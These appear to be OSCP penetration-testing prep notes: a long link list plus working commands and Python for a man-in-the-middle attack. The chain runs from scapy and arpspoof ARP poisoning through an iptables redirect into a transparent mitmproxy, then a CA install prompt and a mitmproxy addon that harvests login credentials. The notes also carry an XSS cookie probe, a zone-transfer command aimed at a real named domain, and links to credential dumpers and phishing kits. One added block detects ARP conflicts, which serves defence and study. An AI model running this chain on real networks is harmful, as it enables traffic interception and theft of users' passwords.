Offensive Security Certified Professional (OSCP)
Offensive Security Certified Professional (OSCP) is an ethical hacking certification offered by Offensive Security that teaches penetration-testing methodology and the use of the tools shipped with the BackTrack penetration-testing distribution (now succeeded by Kali Linux). The OSCP certification consists of a hands-on exam that requires successfully attacking and compromising several machines in a controlled, isolated lab environment. It is currently one of the few certifications that requires demonstrated practical skill in the form of an actual penetration test.
References for preparation
- shi_ver_bot : A Telegram bot to see if your password was in the BreachCompilation
BeEF project
boca site, search box: test with <script>alert(document.cookie)</script> (reflected XSS check; a pop-up showing the cookie means the search term is echoed into the page unescaped)
dig @200.111.157.67 unap.cl -t AXFR    # DNS zone transfer attempt against that nameserver; only returns the zone if AXFR is allowed from arbitrary clients
port knocking
https://blog.wpscans.com/sniff-wordpress-login-credentials-wireshark-http-connection/
https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/ https://kali.training/lessons/introduction/
https://kali.training/topic/introduction-to-kali-linux/
https://www.offensive-security.com/information-security-certifications/oswe-offensive-security-web-expert/ https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/ https://www.offensive-security.com/information-security-training/penetration-testing-training-kali-linux/
Wireshark filter: (ip.addr == 10.168.40.145) and !(udp contains "HTTP/1.1")    # all traffic of one host, excluding UDP datagrams (e.g. SSDP) that also carry the string "HTTP/1.1"
https://tools.kali.org/information-gathering/nmap
Wireshark filter: ip.src == 192.168.0.99 && tcp.flags.syn==1 && tcp.flags.ack==1    # SYN/ACKs sent by the host, i.e. the ports it answered as open (useful to review a port scan capture)
https://github.com/alearea51/IKn0wU
https://github.com/TunisianEagles/SocialBox
https://github.com/gentilkiwi/mimikatz https://github.com/AlessandroZ/LaZagne
https://github.com/vk496/linset
https://github.com/WifiPhisher
https://github.com/xtr4nge/FruityWifi
scapy (ARP cache poisoning: tell the victim, pdst, that the spoofed IP, psrc, lives at our MAC)
from scapy.all import ARP, send
# hwdst must be the victim's MAC address. The first attempt passed an IPv6 link-local address, which is not a MAC and scapy rejects:
a = ARP(op="who-has", psrc="192.168.168.2", pdst="192.168.168.131", hwdst="fe80::4067:2e3f:d06:61bd")   # wrong: hwdst is not a MAC
send(a, inter=3, loop=1)
# Corrected: IP to spoof (gateway) = 10.168.40.1, victim IP = 10.168.40.70, victim MAC = 08:00:27:52:2D:A0
a = ARP(op="who-has", psrc="10.168.40.1", pdst="10.168.40.70", hwdst="08:00:27:52:2D:A0")
send(a, inter=3, loop=1)   # resend every 3 s so the poisoned entry does not expire; needs root
ettercap
ettercap -T -q -i eth0 -P dns_spoof -M arp /10.168.40.145///    # text UI, quiet, ARP MITM against that single target; the dns_spoof plugin answers from /etc/ettercap/etter.dns
tcpdump -n -i wlan0 -e 'arp or icmp'    # -e prints the link-layer (MAC) addresses, which is what you need to see which MAC is answering for an IP
arping -c 1 -I wlan0 10.168.40.1
ARPING 10.168.40.1
60 bytes from 08:00:27:7e:b5:f7 (10.168.40.1): index=0 time=1.363 msec
60 bytes from 00:17:c5:15:81:6a (10.168.40.1): index=1 time=2.670 msec
--- 10.168.40.1 statistics ---
One request, two replies with different MACs for the same IP: the gateway address is being spoofed. One MAC is the real gateway and the other the host poisoning the cache; compare against the MAC recorded before the attack to tell which is which.
https://sandilands.info/sgordon/arp-spoofing-on-wired-lan
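As an added example (not from the original notes and not scapy's own code), the frames those scapy lines put on the wire, built and parsed by hand, plus a detector for the condition arping revealed above: one IP claimed by two MACs. The gateway and victim addresses follow the notes above; the gateway MAC, the victim MAC and the "attacker" role given to 00:17:c5:15:81:6a are constructed sample data.

```python
"""Added example: raw ARP frames (what scapy's ARP(op=, psrc=, pdst=, hwdst=) produces)
and a detector for the two-MACs-for-one-IP condition. Sample traffic is constructed."""
import struct
from collections import defaultdict

ETH_P_ARP = 0x0806
ARP_REQUEST = 1          # scapy: op="who-has"
ARP_REPLY = 2            # scapy: op="is-at"
BROADCAST = "ff:ff:ff:ff:ff:ff"
ZERO_MAC = "00:00:00:00:00:00"


def mac_to_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def bytes_to_mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def ip_to_bytes(ip: str) -> bytes:
    return bytes(int(o) for o in ip.split("."))


def bytes_to_ip(b: bytes) -> str:
    return ".".join(str(x) for x in b)


def build_arp(op: int, hwsrc: str, psrc: str, pdst: str, hwdst: str = ZERO_MAC) -> bytes:
    """Ethernet II header + 28-byte ARP body (42 bytes).

    For poisoning, psrc is the IP we impersonate (the gateway) and hwdst/pdst
    identify the victim, so the frame goes unicast to the victim. hwdst must be
    a MAC address; an IPv6 link-local address there is invalid.
    """
    eth_dst = BROADCAST if hwdst == ZERO_MAC else hwdst
    eth = mac_to_bytes(eth_dst) + mac_to_bytes(hwsrc) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)        # htype, ptype, hlen, plen, op
    arp += mac_to_bytes(hwsrc) + ip_to_bytes(psrc)          # sender hardware / protocol address
    arp += mac_to_bytes(hwdst) + ip_to_bytes(pdst)          # target hardware / protocol address
    return eth + arp


def parse_arp(frame: bytes):
    """Return the ARP fields of an Ethernet frame, or None if it is not ARP over IPv4."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {
        "op": op,
        "hwsrc": bytes_to_mac(frame[22:28]), "psrc": bytes_to_ip(frame[28:32]),
        "hwdst": bytes_to_mac(frame[32:38]), "pdst": bytes_to_ip(frame[38:42]),
    }


def detect_conflicts(frames):
    """Map IP -> set of MACs that claimed it as sender, keeping only IPs with more
    than one claimant. Requests and replies both update a host's ARP cache, so
    both count; this is the arping symptom above, computed from a capture."""
    claims = defaultdict(set)
    for frame in frames:
        arp = parse_arp(frame)
        if arp and arp["psrc"] != "0.0.0.0":                # skip ARP probes (sender IP 0.0.0.0)
            claims[arp["psrc"]].add(arp["hwsrc"])
    return {ip: macs for ip, macs in claims.items() if len(macs) > 1}


# Constructed sample traffic (IPs from the notes above, MACs and roles assumed)
GATEWAY_IP, GATEWAY_MAC = "10.168.40.1", "08:00:27:7e:b5:f7"
VICTIM_IP, VICTIM_MAC = "10.168.40.70", "08:00:27:52:2d:a0"
ATTACKER_MAC = "00:17:c5:15:81:6a"

SAMPLE_FRAMES = [
    # legitimate exchange: the victim asks for the gateway, the gateway answers
    build_arp(ARP_REQUEST, VICTIM_MAC, VICTIM_IP, GATEWAY_IP),
    build_arp(ARP_REPLY, GATEWAY_MAC, GATEWAY_IP, VICTIM_IP, VICTIM_MAC),
    # poison frame, equivalent to ARP(op="who-has", psrc=gateway, pdst=victim, hwdst=victim MAC)
    build_arp(ARP_REQUEST, ATTACKER_MAC, GATEWAY_IP, VICTIM_IP, VICTIM_MAC),
]

if __name__ == "__main__":
    for ip, macs in detect_conflicts(SAMPLE_FRAMES).items():
        print(f"ARP conflict: {ip} claimed by {sorted(macs)}")
```

Fed real frames (e.g. from a raw AF_PACKET socket or a pcap reader), detect_conflicts flags the gateway as soon as the poison frames start, which is the check to run on a LAN you suspect is being intercepted.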
mitmproxy (transparent interception after ARP poisoning)
sysctl -w net.ipv4.ip_forward=1    # forward the victim's traffic; without this the victim simply loses connectivity
arpspoof -i eth0 -t 10.168.40.70 10.168.40.1    # tells the victim we are the gateway; run it again with the two addresses swapped to poison the gateway side as well
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8080
mitmproxy --mode transparent    # listens on 8080; intercepted HTTPS only works cleanly once the victim trusts the mitmproxy CA (mitm.it, below)
bettercap -T <victim_ip> --proxy -P POST    # bettercap 1.x syntax: -P takes a parser list, e.g. POST to print submitted forms
https://github.com/byt3bl33d3r/MITMf https://backtrackacademy.com/articulo/saltando-hsts-con-man-in-the-middle-framework http://www.elladodelmal.com/2016/03/ataques-man-in-middle-hsts-sslstrip-2.html
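Added example, not part of the original notes and not code from mitmproxy, bettercap or WPScan: the credential-harvesting step that the Wireshark filters and the bettercap POST parser above perform, done in Python on a captured plaintext HTTP POST. The WordPress-style login request, the host blog.example and the list of credential field names are constructed and assumed. The `request(flow)` function at the end wires the same parser up as a mitmproxy addon hook (load it with `mitmproxy -s thisfile.py --mode transparent`); it uses the mitmproxy flow API and is not exercised offline.

```python
"""Added example: extract login credentials from a captured HTTP POST (what sniffing
wp-login.php in Wireshark, or bettercap -P POST, shows you). Sample request is constructed."""
import logging
from urllib.parse import parse_qs

# Assumed list of form field names that usually carry credentials (WordPress uses "log" and "pwd")
CREDENTIAL_FIELDS = {"log", "pwd", "user", "username", "email", "login", "pass", "passwd", "password"}


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, path, headers, body).
    Header names are lower-cased; the body is cut to Content-Length so any
    trailing bytes from the capture are ignored."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete request: end of headers not found")
    lines = head.decode("iso-8859-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    if "content-length" in headers:
        body = body[: int(headers["content-length"])]
    return method, path, headers, body


def find_credentials(content_type: str, body: bytes) -> dict:
    """Credential-looking fields from a urlencoded form body. JSON and multipart
    bodies are out of scope here and yield nothing rather than a false hit."""
    if not content_type or not content_type.lower().startswith("application/x-www-form-urlencoded"):
        return {}
    form = parse_qs(body.decode("utf-8", errors="replace"), keep_blank_values=True)
    return {k: v[0] for k, v in form.items() if k.lower() in CREDENTIAL_FIELDS}


def sniff_credentials(raw: bytes) -> dict:
    """Only POSTs carry form logins; returns {} for anything else. The _target key
    records which site the login was sent to (Host header + path)."""
    method, path, headers, body = parse_http_request(raw)
    if method != "POST":
        return {}
    creds = find_credentials(headers.get("content-type", ""), body)
    if creds:
        creds["_target"] = headers.get("host", "?") + path
    return creds


def request(flow):
    """mitmproxy addon hook: same parser fed from the flow object.
    flow.request.headers / .content / .pretty_url are mitmproxy's API."""
    creds = find_credentials(flow.request.headers.get("content-type", ""), flow.request.content or b"")
    if creds:
        logging.warning("credentials sent to %s: %s", flow.request.pretty_url, creds)


# Constructed sample: a WordPress wp-login.php login as it travels over plain HTTP
SAMPLE_BODY = b"log=admin&pwd=S3cret%21&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1"
SAMPLE_POST = (
    b"POST /wp-login.php HTTP/1.1\r\n"
    b"Host: blog.example\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: " + str(len(SAMPLE_BODY)).encode() + b"\r\n"
    b"\r\n" + SAMPLE_BODY
)

if __name__ == "__main__":
    print(sniff_credentials(SAMPLE_POST))
```

The percent-decoding matters: the captured body shows `pwd=S3cret%21`, while the password the user typed is `S3cret!`; reading the raw bytes off Wireshark without decoding gives a wrong credential.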
https://www.trustwave.com/Resources/SpiderLabs-Blog/Changes-in-Oracle-Database-12c-password-hashes/
WIFI
https://github.com/xtr4nge/FruityC2
android https://github.com/M4sc3r4n0/Evil-Droid
extra
https://github.com/nixawk/pentest-wiki
https://geekflare.com/online-scan-website-security-vulnerabilities/
other
https://es.scribd.com/document/13213787/CUH-E-zine-4%C2%AA-Edicion
https://www.aircrack-ng.org/doku.php?id=es:aireplay-ng https://www.aircrack-ng.org/doku.php?id=es:deauthentication
https://www.offensive-security.com/metasploit-unleashed/
https://blog.segu-info.com.ar/2018/09/examen-de-prueba-para-estudiantes-del.html https://www.alienvault.com/blogs/security-essentials/how-to-prepare-to-take-the-oscp
OSCP
https://www.sniferl4bs.com/2015/11/entrenando-en-casa-para-rendir-el-oscp.html https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-1-is-oscp-for-you-b57cbcce7440 https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-2-workflow-and-documentation-tips-9dd335204a48 https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-3-practical-hacking-tips-and-tricks-c38486f5fc97
https://support.offensive-security.com/#!pwk-support.md https://support.offensive-security.com/#!oscp-exam-guide.md
https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf https://www.securitysift.com/offsec-pwb-oscp/ https://www.adampalmer.me/iodigitalsec/2013/04/11/offensive-security-pwb-course-and-oscp-certification-review/
https://vcatalan.com/2017/01/OSCP-part-I-preparacion-estudio-previo.html
https://mytcpip.com/2017/08/10/taller-de-hacking-i-nmap-a-fondo-metasploit-basico/ https://null-byte.wonderhowto.com/forum/upload-shell-from-phpmyadmin-xampp-by-mohamed-ahmed-0179931/
https://www.exam-labs.com/exam/NSE4#tutorial
https://www.ihacklabs.com/es/el-mejor-sistema-de-pivoting-en-linux/
https://wiki.wireshark.org/SampleCaptures
https://github.com/ibr2/pwk-cheatsheet
https://www.keiththome.com/oscp-course-review/
http://fl3x.us/blog/2015/09/22/order-wireless-devices-for-wifu-course/
https://amonsec.net/course/offensive-security-pwk-course-review
https://blog.g0tmi1k.com/2013/08/cracking-perimeter-ctp-offensive/
https://www.ihacklabs.com/es/certificacion-osce-review-cracking-the-perimeter-ctp/
http://www.vividmachines.com/shellcode/shellcode.html
https://www.securitysift.com/offsec-ctp-osce/
https://hackforums.net/member.php
http://nixware.net/my-osce-journey
http://www.cs.virginia.edu/~evans/cs216/guides/x86.html
https://www.pentesteracademy.com/topics
https://openwall.info/wiki/p_lkrg/Main
https://github.com/tanc7/hacking-books
https://infosecuritygeek.com/vulnhub-kioptrix-2014/
http://www.securitysift.com/offsec-pwb-oscp/
https://xapax.gitbooks.io/security/content/
https://medium.com/@bondo.mike/ptp-lab-privilege-escalation-with-services-5d14a99a28d1
https://medium.com/@m4lv0id/and-i-did-oscp-589babbfea19
Cupp, to build a wordlist from a target's profile: git clone https://github.com/Mebus/cupp.git
Brute-force attacks against social-network accounts: git clone https://github.com/TunisianEagles/SocialBox.git
Dump passwords stored locally on the machine (browsers, mail clients, etc.): https://github.com/AlessandroZ/LaZagne
Cracking WPA/WPA2 via phishing (evil twin with a captive portal): https://github.com/vk496/linset https://github.com/wifiphisher/wifiphisher
instabridge
mitmproxy --mode transparent
mitm.it/cert/p12    # once traffic flows through the proxy, the victim browser can fetch the mitmproxy CA here (PKCS#12 bundle); install it so intercepted HTTPS stops raising certificate warnings
bettercap -T [victim_ip] --proxy -P POST
Evil-Droid git clone https://github.com/M4sc3r4n0/Evil-Droid.git
https://www.giuspen.com/cherrytree/
https://github.com/mikaelkall/HackingAllTheThings
https://www.vortex.id.au/2017/05/oscp-exam-preparation-exam-day-report-day/
https://github.com/P3t3rp4rk3r/OSCP-cheat-sheet-1
https://github.com/so87/OSCP-PwK
https://medium.com/@chennylmf/hackthebox-lame-c28b19558cb0
https://github.com/OlivierLaflamme/Cheatsheet-God
https://medium.com/@cymtrick/oscp-cheat-sheet-5b8aeae085ad
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
https://medium.com/@chennylmf/hackthebox-walkthrough-tartarsauce-810a8df296c1
http://www.fuzzysecurity.com/tutorials/16.html
Good reviews of CTP/OSCE (in no particular order):
Tutorial sites (more stars = better/recommended):
Cheatsheets:
Good practice sites:
Vulnerable machines (VulnHub VMs):
- SickOS 1.1
- SickOS 1.2
- Droopy v0.2
- Kevgir
- Pegasus
- SecTalks: BNE0x00 - Minotaur
- SecTalks: BNE0x03 - Simple
- NullByte: 1
- FristiLeaks 1.3
Vulnerable web applications:
- OWASP Vulnerable Web Applications Directory Project
- Mutillidae
- Damn Vulnerable Web Application
LFI/RFI https://penetrate.io/2014/01/10/from-rfi-to-shell/
Backdooring files with Python: https://github.com/secretsquirrel/the-backdoor-factory
eBook downloads:
- http://www.ebook777.com/gray-hat-hacking-ethical-hackers-handbook-fourth-edition/
- https://github.com/JpGallegos/CySecBooks
- https://www.securepla.net/the-hacker-playbook-2/
- "Hacking: The Art of Exploitation"
https://www.linkedin.com/pulse/osce-cracking-perimeter-experience-sunny-neo covers:
- Fuzzing (Scapy, TAO, Sulley)
- Linux exploitation (vanilla stack overflow, return-to-libc as an NX bypass, repairing stack canaries, ASLR bypasses) and Windows exploitation (SEH overwrite, return-oriented programming to disable DEP)
- The Web Application Hacker's Handbook (might be too large: consider WebGoat instead)
Various sites:
- http://www.sweetscape.com/ (010 Editor)
- https://github.com/campagnola/pycca
- https://github.com/Gallopsled/pwntools
- https://github.com/reyammer/shellnoob
- https://zeltser.com/convert-shellcode-to-assembly/
- http://files.cnblogs.com/files/exclm/ollydbg_cmdline_cheat_sheet.pdf
- http://bernardodamele.blogspot.sg/2011/09/reverse-shells-one-liners.html
- https://www.digitalocean.com/community/tutorials/how-to-use-bash-history-commands-and-expansions-on-a-linux-vps
- https://github.com/peterferrie/win-exec-calc-shellcode
- http://www.secniu.com/why-my-shellcode-cannot-work/
- http://thestarman.pcministry.com/asm/2bytejumps.htm
- http://blog.noobroot.com/
- https://www.exploit-db.com/exploits/5342/
- http://exploit.co.il/hacking/manual-egghuntershellcode-encoding/
- https://github.com/salcho/codetz
- http://xangosec.blogspot.sg/2014/08/automating-sub-encoder.html
- http://www.fuzzing.org/
- http://resources.infosecinstitute.com/pattern-based-approach-memory-shellcodes-detection/
- https://www.offensive-security.com/metasploit-unleashed/alphanumeric-shellcode/
- https://0x41.no/hacking-networks-with-snmp/
- http://danielebellavista.blogspot.sg/2014/10/ia32-shellcodes-get-eip-value.html
- http://www.thepentesters.net/tutorials/tricks-escaping-linux-restricted-shells/
- http://codemachine.com/downloads.html
Fun random stuff:
- http://patriciopalladino.com/files/hieroglyphy/
- http://n01g3l.tumblr.com/
- https://twitter.com/ch3rn0byl/status/832681279900487680
https://blog.g0tmi1k.com/2012/02/kioptrix-level-4-sql-injection/
https://blog.g0tmi1k.com/2012/01/hackademic-rtb2/
https://github.com/vanhoefm/modwifi https://github.com/vanhoefm/blackhat17-pocs
https://github.com/0x90/uberscapy
https://github.com/0x90/wifi-arsenal https://github.com/0x90/kali-scripts
https://nets.ec/Main_Page https://old.exploit-db.com/exploits/13284/
https://packetstormsecurity.com/files/90146/Ascii-To-Shellcode-Encoder-Decoder-Tool.html
https://underc0de.org/foro/hacking/que-es-una-shellcode/
https://0x00sec.org/t/linux-shellcoding-part-1-0/289
https://github.com/Grazfather/PracticalMalwareLabs https://github.com/Grazfather/BlackHatPython
https://github.com/VulnHub/ctf-writeups
https://nullku7.github.io/stuff/vulnhub/walkthrough/2017/05/28/vulnhub-mr-robot.html
https://exploit.courses/#/challenges
https://payatu.com/guide-linux-privilege-escalation/
https://github.com/dobin/yookiterm-slides
https://exploit.courses/files/bfh2018/content.html
https://exploit.courses/files/bfh2017/content.html
https://blog.vonhewitt.com/2018/08/oscp-exam-cram-log-aug-sept-oct-2018/
https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/
https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
https://www.exploit-db.com/exploits/44298
https://github.com/jivoi/pentest
https://github.com/lucyoa/kernel-exploits
https://github.com/Manisso/fsociety
Fsociety Hacking Tools Pack: a penetration-testing framework that bundles the scripts a pentester commonly needs.
Linux kernel-mode rootkit hunter for kernels 4.4.0-31 and later: https://github.com/nbulischeck/tyton https://nbulischeck.github.io/tyton/
https://github.com/fireeye/flare-vm - FLARE VM - a fully customizable, Windows-based security distribution for malware analysis, incident response, penetration testing, etc.
https://github.com/frizb/Vanquish
Vanquish is a Kali Linux-based enumeration orchestrator written in Python. It drives the open-source enumeration tools shipped with Kali through several active information-gathering phases; the results of each phase feed the next, to identify vulnerabilities that could be leveraged for a remote shell.
https://www.youtube.com/watch?v=YoNrNBnmwuY&feature=youtu.be
https://github.com/coreb1t/awesome-pentest-cheat-sheets
https://www.oracle.com/technetwork/community/developer-vm/index.html
https://github.com/buglessdr?tab=repositories
https://github.com/buglessdr/oscp-1
https://github.com/buglessdr/myarsenal
https://github.com/buglessdr/linux-exploit-suggester
https://github.com/buglessdr/OSCP-2
https://github.com/pentestmonkey
https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki
https://github.com/ston3o/docker-hacklab
https://gist.github.com/jivoi/724e4b4b22501b77ef133edc63eba7b4
http://overthewire.org/wargames/
https://github.com/SecWiki/linux-kernel-exploits
https://opnsense.org/download/
https://github.com/thelinuxchoice?tab=repositories
https://github.com/osirislab/Hack-Night/
http://www.opensecuritytraining.info/Exploits1.html
http://www.opensecuritytraining.info/Exploits2.html